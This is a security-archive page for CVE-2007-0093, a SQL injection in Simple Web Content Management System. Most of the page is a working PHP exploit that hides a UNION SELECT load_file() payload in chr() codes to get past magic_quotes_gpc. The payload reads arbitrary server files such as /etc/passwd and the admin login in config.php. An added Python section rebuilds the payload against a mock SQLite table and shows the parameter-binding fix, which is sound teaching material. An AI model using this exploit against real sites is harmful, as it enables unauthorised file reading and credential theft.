Simple Web Content Management System SQL Injection Exploit
2007.01.07
Credit: DarkFig
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2007-0093
CWE: CWE-89
CVSS base score: 7.5/10
Impact: 6.4/10
Exploitability: 10/10
Access required: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial
```php
#!/usr/bin/php
<?php
/**
 * This file requires the PhpSploit class.
 * If you want to use this class, the latest
 * version can be downloaded from acid-root.new.fr.
 **/
require("phpsploitclass.php");

if($argc < 3)
{
    print("
--------------------------------------------------------
Affected.scr..: Simple Web Content Management System
Poc.ID........: 18070102
Type..........: SQL Injection
Risk.level....: Medium
Src.download..: www.cms-center.com
Poc.link......: acid-root.new.fr/poc/18070102.txt
Credits.......: DarkFig
--------------------------------------------------------
Usage.........: php xpl.txt <url> <file>
Options.......: <proxhost:proxport> <proxuser:proxpass>
Example.......: php xpl.txt http://hihi.org/ /etc/passwd
--------------------------------------------------------\n");
    exit(1);
}

$url   = $argv[1];
$file  = $argv[2];
$proxh = isset($argv[3]) ? $argv[3] : '';
$proxa = isset($argv[4]) ? $argv[4] : '';

$xpl = new phpsploit();
$xpl->agent("Mozilla");
if($proxh) $xpl->proxy($proxh);
if($proxa) $xpl->proxyauth($proxa);

/*
 * $id = $_GET['id'];
 * $query = "SELECT * from content WHERE id = $id";
 * ...
 * @return $row->text;
 *
 * Simple SQL injection (register_globals=off ; magic_quotes_gpc=on).
 * What we want is not in the database, it's in a file (config.php):
 *
 * //this are the logins for the admin part. Change them for security.
 * $login = "test"; //your login for the admin section.
 * $pass = "1234"; //your login for the admin section.
 *
 * PS: The chr() calls were used to make fun of the people who use
 * this only for d4 h4x0r styl3 =).
 */

// PCRE pattern matching the static HTML the CMS emits before the content column
// (\r\n below stands for a literal CRLF). Decoded:
// /<html>\r\n<head>\r\n<title>contentframe<\/title>\r\n<link href="\/style.css" rel="stylesheet" type="text\/css">\r\n<meta http-equiv="Content-Type" content="text\/html; charset=iso-8859-1">\r\n<\/head>\r\n\r\n<body>/
$header =
chr(0x2f).chr(0x3c).chr(0x68).chr(0x74).chr(0x6d).chr(0x6c).chr(0x3e).chr(0x0d).
chr(0x0a).chr(0x3c).chr(0x68).chr(0x65).chr(0x61).chr(0x64).chr(0x3e).chr(0x0d).
chr(0x0a).chr(0x3c).chr(0x74).chr(0x69).chr(0x74).chr(0x6c).chr(0x65).chr(0x3e).
chr(0x63).chr(0x6f).chr(0x6e).chr(0x74).chr(0x65).chr(0x6e).chr(0x74).chr(0x66).
chr(0x72).chr(0x61).chr(0x6d).chr(0x65).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x74).
chr(0x69).chr(0x74).chr(0x6c).chr(0x65).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).
chr(0x6c).chr(0x69).chr(0x6e).chr(0x6b).chr(0x20).chr(0x68).chr(0x72).chr(0x65).
chr(0x66).chr(0x3d).chr(0x22).chr(0x5c).chr(0x2f).chr(0x73).chr(0x74).chr(0x79).
chr(0x6c).chr(0x65).chr(0x2e).chr(0x63).chr(0x73).chr(0x73).chr(0x22).chr(0x20).
chr(0x72).chr(0x65).chr(0x6c).chr(0x3d).chr(0x22).chr(0x73).chr(0x74).chr(0x79).
chr(0x6c).chr(0x65).chr(0x73).chr(0x68).chr(0x65).chr(0x65).chr(0x74).chr(0x22).
chr(0x20).chr(0x74).chr(0x79).chr(0x70).chr(0x65).chr(0x3d).chr(0x22).chr(0x74).
chr(0x65).chr(0x78).chr(0x74).chr(0x5c).chr(0x2f).chr(0x63).chr(0x73).chr(0x73).
chr(0x22).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x6d).chr(0x65).chr(0x74).
chr(0x61).chr(0x20).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x2d).chr(0x65).
chr(0x71).chr(0x75).chr(0x69).chr(0x76).chr(0x3d).chr(0x22).chr(0x43).chr(0x6f).
chr(0x6e).chr(0x74).chr(0x65).chr(0x6e).chr(0x74).chr(0x2d).chr(0x54).chr(0x79).
chr(0x70).chr(0x65).chr(0x22).chr(0x20).chr(0x63).chr(0x6f).chr(0x6e).chr(0x74).
chr(0x65).chr(0x6e).chr(0x74).chr(0x3d).chr(0x22).chr(0x74).chr(0x65).chr(0x78).
chr(0x74).chr(0x5c).chr(0x2f).chr(0x68).chr(0x74).chr(0x6d).chr(0x6c).chr(0x3b).
chr(0x20).chr(0x63).chr(0x68).chr(0x61).chr(0x72).chr(0x73).chr(0x65).chr(0x74).
chr(0x3d).chr(0x69).chr(0x73).chr(0x6f).chr(0x2d).chr(0x38).chr(0x38).chr(0x35).
chr(0x39).chr(0x2d).chr(0x31).chr(0x22).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).
chr(0x5c).chr(0x2f).chr(0x68).chr(0x65).chr(0x61).chr(0x64).chr(0x3e).chr(0x0d).
chr(0x0a).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x62).chr(0x6f).chr(0x64).chr(0x79).
chr(0x3e).chr(0x2f);

// Injected request path. Decoded:
// page.php?id=-1/**/union/**/select/**/null,null,null,null,load_file(concat(char(..),char(..),...)),null,null,null
// id=-1 empties the real row set; the UNION has eight columns, and the fifth
// (the one page.php prints as $row->text) is load_file() of the requested file.
// The file name is spelled as char() codes inside concat(), so the request
// contains no quote characters and magic_quotes_gpc has nothing to escape.
$sql =
chr(0x70).chr(0x61).chr(0x67).chr(0x65).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).
chr(0x3f).chr(0x69).chr(0x64).chr(0x3d).chr(0x2d).chr(0x31).chr(0x2f).chr(0x2a).
chr(0x2a).chr(0x2f).chr(0x75).chr(0x6e).chr(0x69).chr(0x6f).chr(0x6e).chr(0x2f).
chr(0x2a).chr(0x2a).chr(0x2f).chr(0x73).chr(0x65).chr(0x6c).chr(0x65).chr(0x63).
chr(0x74).chr(0x2f).chr(0x2a).chr(0x2a).chr(0x2f).chr(0x6e).chr(0x75).chr(0x6c).
chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).
chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c).
chr(0x2c).chr(0x6c).chr(0x6f).chr(0x61).chr(0x64).chr(0x5f).chr(0x66).chr(0x69).
chr(0x6c).chr(0x65).chr(0x28).chr(0x63).chr(0x6f).chr(0x6e).chr(0x63).chr(0x61).
chr(0x74).chr(0x28).concatcharfu($file).chr(0x29).chr(0x29).chr(0x2c).chr(0x6e).
chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c).
chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c);

// PCRE pattern for the static HTML after the content column. Decoded:
// /<\/body>\r\n<\/html>/
$footer =
chr(0x2f).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x62).chr(0x6f).chr(0x64).chr(0x79).
chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x68).chr(0x74).
chr(0x6d).chr(0x6c).chr(0x3e).chr(0x2f);

// Fetch the page, strip the surrounding HTML, and print what is left:
// the contents of the requested file.
$xpl->get($url.$sql);
$ct = preg_replace($footer,'',$xpl->getcontent());
print preg_replace($header,'',$ct);

// Turn "/etc/passwd" into "char(47),char(101),..." so the file name can be
// passed to MySQL without any quote characters.
function concatcharfu($file)
{
    $dat = '';
    for($i=0;$i<strlen($file);$i++)
    {
        $dat .= 'char('.ord($file[$i]).')';
        if($i != (strlen($file)-1)) $dat .= ',';
    }
    return $dat;
}
?>
```
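The injection the exploit relies on, as an added example that is not part of the original advisory or DarkFig's code: a Python script that rebuilds the same UNION SELECT payload (the `char()`/`concat()` spelling of the file name that `concatcharfu()` produces, which contains no quote characters and is therefore untouched by `magic_quotes_gpc`), runs it against an in-memory SQLite table shaped like the eight-column `content` table the exploit assumes, and then shows the fix. `load_file()` and `concat()` are MySQL functions; here they are stand-ins registered on the SQLite connection that read from a constructed fake filesystem. The table layout, the column names, the file contents and the `magic_quotes` emulation are all assumptions made for this demo, not facts from the page.

```python
import re
import sqlite3

# Constructed stand-in for the files MySQL's load_file() would read (assumption).
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n",
    "/var/www/config.php": '<?php $login = "test"; $pass = "1234"; ?>',
}


def build_payload(path):
    """Rebuild the id= value the exploit sends: a negative id so the real
    query returns nothing, then a UNION whose 5th column is load_file() of the
    path. The path is spelled as char() codes joined by concat(), exactly what
    concatcharfu() does, so the payload contains no quote characters."""
    chars = ",".join("char(%d)" % ord(c) for c in path)
    return ("-1/**/union/**/select/**/null,null,null,null,"
            "load_file(concat(%s)),null,null,null" % chars)


def magic_quotes(s):
    """Emulate PHP's magic_quotes_gpc=on (addslashes on request data):
    backslash-escape single quote, double quote, backslash and NUL."""
    return re.sub(r"(['\"\\\x00])", r"\\\1", s)


def open_db():
    """In-memory SQLite with MySQL look-alikes for the functions the payload uses.
    SQLite already provides char(); concat() and load_file() are registered here."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("load_file", 1, lambda p: FAKE_FS.get(p))
    conn.create_function("concat", -1, lambda *parts: "".join(parts))
    # Eight columns, text in the fifth, matching the exploit's null placement (assumption).
    conn.execute("CREATE TABLE content (id INTEGER, c2, c3, c4, text, c6, c7, c8)")
    conn.execute("INSERT INTO content VALUES (1, NULL, NULL, NULL, 'Welcome', NULL, NULL, NULL)")
    return conn


def vulnerable_page(conn, id_param):
    """The pattern quoted in the advisory: $id interpolated, unquoted, into the
    query. Returns the text column of the first row, as page.php prints it."""
    row = conn.execute("SELECT * FROM content WHERE id = %s" % id_param).fetchone()
    return row[4] if row else None


def hardened_page(conn, id_param):
    """Fix: require an integer and bind it as a parameter. Either measure alone
    stops this payload; together they also keep the query plan honest."""
    try:
        id_int = int(id_param)
    except ValueError:
        return None
    row = conn.execute("SELECT * FROM content WHERE id = ?", (id_int,)).fetchone()
    return row[4] if row else None


def demo(path="/var/www/config.php"):
    """Run the payload through the magic-quotes filter (which changes nothing,
    since there is nothing to escape) against both handlers."""
    conn = open_db()
    payload = magic_quotes(build_payload(path))
    return {
        "normal": vulnerable_page(conn, "1"),
        "vulnerable": vulnerable_page(conn, payload),
        "hardened": hardened_page(conn, payload),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-10s %r" % (name, result))
```

The point the comment block in the exploit makes in passing is the one worth remembering: `magic_quotes_gpc` only escapes quote characters, and a numeric WHERE clause never needed a quote to be closed. Escaping is not a defence for integer parameters; type enforcement and parameter binding are.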
Copyright 2024, cxsecurity.com